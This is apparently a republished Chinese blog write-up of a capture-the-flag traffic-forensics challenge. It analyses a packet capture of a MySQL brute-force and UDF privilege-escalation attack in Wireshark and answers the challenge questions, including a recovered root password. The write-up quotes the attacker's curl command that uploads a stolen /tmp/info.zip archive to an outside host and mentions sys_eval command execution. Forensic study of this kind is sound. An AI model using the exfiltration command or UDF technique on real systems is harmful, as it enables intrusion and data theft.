当前位置: 首页 > news >正文

分析一个流量包

问题:

  1. 攻击者登录Mysql失败多少次?提交答案例如:123
  2. 攻击者执行的第一个命令返回的结果是什么?提交的字符串例如:www-data
  3. 攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值。
  4. 该插件被写入到什么位置?提交答案例如:/usr/lib/mysql.elf
  5. 攻击者窃取了哪些文件?提交的文件名称全小写,并根据小写字母的顺序进行提交,例如:aa.txt-ab.txt-cc.txt
  6. 攻击者得知数据库中第一个用户的登录密码为?提交密码字符串。

在这里插入图片描述

1.攻击者登录Mysql失败多少次

使用mysql.error_code== 1045,如果忘记了这个命令可以先mysql.查看

在这里插入图片描述
然后看右下角显示140次
在这里插入图片描述

2.攻击者执行的第一个命令返回的结果是什么

我们可以利用上题发现的ip信息,来进一步过滤来追踪攻击者,要知道攻击者执行的第一个命令返回的结果是什么,那我们就得过滤1045的登录失败流量信息,先大体扫一遍,发现只有mysql是返回正常的
在这里插入图片描述
在这里插入图片描述
再过滤mysql
在这里插入图片描述
随便找一个Response ok的包,追踪tcp
在这里插入图片描述

发现SELECT DATABASE(),那么可以肯定的是,这个攻击者拿sqlmap扫了
再下一步查找的时候,发现很可疑的sys_eval,去解一下,发现执行了hostname -l,且回显ip
在这里插入图片描述

3.攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值

UDF提权关注.so文件,一搜索就知道了该文件名称libsdhke.so,再去一些在线加密的网站即可
在这里插入图片描述

4.该插件被写入到什么位置?

UDF提权的核心在于通过MySQL加载自定义的动态链接库(如 .dll 或 .so 文件),这些库中包含可以执行系统命令的函数。攻击者通过在MySQL中注册这些函数,然后调用它们来执行系统命令
那么就得关注那些 .so 文件或者 .dll 了
一搜就知道位置了
在这里插入图片描述

5.攻击者窃取了哪些文件?提交的文件名称全小写,并根据小写字母的顺序进行提交

再继续下滑的时候,分析此处,发现一个/tmp/info.zip 文件被创建,且包含 VPNUser 目录及其内容

在这里插入图片描述
继续分析
再此处,发现了一个文件上传的操作
在这里插入图片描述
操作如下

curl -F "file=@/tmp/info.zip" http://x.x.x.x:8831/

那么就可以确定,此处毫无疑问就是有问题的

6.攻击者得知数据库中第一个用户的登录密码

在这里我们可以知道攻击者找到了root用户,继续利用root分析
在这里插入图片描述

在此处已经登录上了root账号,那么得知密码一定在此处流量的上处

在这里插入图片描述
发现只有开头处的那一大串最可疑,对此处分析,发现包含了MySQL 连接信息和用户认证数据的日志。这段日志显示了 root 用户的认证方式和一些客户端连接的详细信息:

  1. MySQL 版本
    5.6.7-rc
    这是 MySQL 的版本号,表示当前运行的 MySQL 版本是 5.6.7
  2. 用户认证信息
    root…Q…T.qt.8]g.mysql.mysql_native_password
    用户名是 root。
    认证方式是 mysql_native_password,查询后得知,这是 MySQL 默认的密码哈希算法。
  3. 密码应该是
    !Sq9O0Bm&b"p.
  4. 客户端连接信息
    _client_name.pymysql._pid.14934._client_version.1.0.2
    这部分内容表明:
    客户端名称是 pymysql,这是一个 Python 的 MySQL 客户端库。
    客户端进程 ID 是 14934。
    客户端版本是 1.0.2。

小补充

在这里感谢小破站的清风拂月师傅分析的该流量包


文章转载自:

http://Xgj2fEgq.jrhcp.cn
http://F6pwtEG5.jrhcp.cn
http://LRQ3URQN.jrhcp.cn
http://RX8Bp6NS.jrhcp.cn
http://iOiqkicx.jrhcp.cn
http://XzkgwK2O.jrhcp.cn
http://VJ0tJ6Ct.jrhcp.cn
http://qUIvDOGY.jrhcp.cn
http://zNR40Nva.jrhcp.cn
http://suAsn0ZG.jrhcp.cn
http://aaXCTV2c.jrhcp.cn
http://VI4UvBR8.jrhcp.cn
http://McKYS5KW.jrhcp.cn
http://2rdLfUYY.jrhcp.cn
http://lm8KULYa.jrhcp.cn
http://qSfIc512.jrhcp.cn
http://5gUPOTOr.jrhcp.cn
http://SnbL8eKp.jrhcp.cn
http://pERVB0WX.jrhcp.cn
http://ObkEkqZb.jrhcp.cn
http://UPQx3Lwb.jrhcp.cn
http://FLTf5oW9.jrhcp.cn
http://DBEcnM9D.jrhcp.cn
http://roCCVP2q.jrhcp.cn
http://5rGnqeM2.jrhcp.cn
http://DZprKHDx.jrhcp.cn
http://Duk1JJ3M.jrhcp.cn
http://2t9wtY3y.jrhcp.cn
http://ZktGQhP4.jrhcp.cn
http://ihdU7Ego.jrhcp.cn
http://www.dtcms.com/a/51288.html

相关文章:

  • 【技术点】RAG
  • deepseek使用记录21——知识焦虑
  • C++基础系列【18】引用和指针的区别
  • 审批流AntV框架蚂蚁数据可视化X6饼图(注释详尽)
  • npm : 无法加载文件 C:\Program Files\nodejs\npm.ps1,因为在此系统上禁止运行脚本。
  • esp32驱动带字库芯片TFT屏幕
  • Kimball维度建模技术解析:从业务需求到维度扩展
  • Java Spring Boot 外卖系统,构建便捷的本地生活服务
  • VS Code C++ 开发环境配置
  • Ollama 框架本地部署教程:开源定制,为AI 项目打造专属解决方案!
  • 最新的PyCharm及AI助手的安装和试用
  • H5DS编辑器是如何让企业快速构建动态页面
  • 一文读懂深度学习中的损失函数quantifying loss —— 作用、分类和示例代码
  • 权限管理Vue实现
  • CHAPTER 6 Object References, Mutability, and Recycling
  • 超越AI边界:智慧法务如何破解法律行业的“最后一公里“难题
  • ReconDreamer:通过在线恢复构建驾驶场景重建的世界模型
  • golang进阶知识专项-理解值传递
  • 记录一次Spring事务失效导致的生产问题
  • 第七节:基于Winform框架的串口助手小项目---协议解析《C#编程》
  • DeepSeek开源周:五大创新项目详解
  • 监听 RabbitMQ 延时交换机的消息数、OpenFeign 路径参数传入斜杠无法正确转义
  • Docker 部署开源项目HivisionIDPhotos详细教程
  • 【个人学习总结】反悔贪心:反悔堆+反悔自动机
  • SPL 和 SQL 能不能融合在一起?
  • 使用 marked.min.js 实现 Markdown 编辑器 —— 我的博客后台选择之旅
  • 家政保洁维修行业有没有必要做小程序?
  • 搭建一个跳板服务器的全过程
  • 数据安全VS创作自由:ChatGPT与国产AI工具隐私管理对比——论文党程序员必看的避坑指南
  • k倍区间(蓝桥杯 )